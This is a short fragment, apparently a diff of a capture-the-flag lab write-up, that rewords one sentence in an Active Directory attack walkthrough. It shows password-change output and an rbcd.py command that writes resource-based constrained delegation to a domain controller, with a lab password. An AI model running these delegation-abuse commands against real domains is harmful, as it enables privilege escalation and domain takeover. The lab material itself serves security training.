Skip to main content

 CHANGE-P...
 10.129.234.63 445 DC [+] Successfully changed password for wsilva

-Now let’s verify RBCD is still configured and obtain a TGT:
+Now verifying that RBCD is still configured, then obtaining a TGT:

 elliot@exegol:~$ rbcd.py -delegate-to 'DC$' -delegate-from wsilva -action write phantom/wsilva:'Elliot123!' -dc-ip 10.129.234.63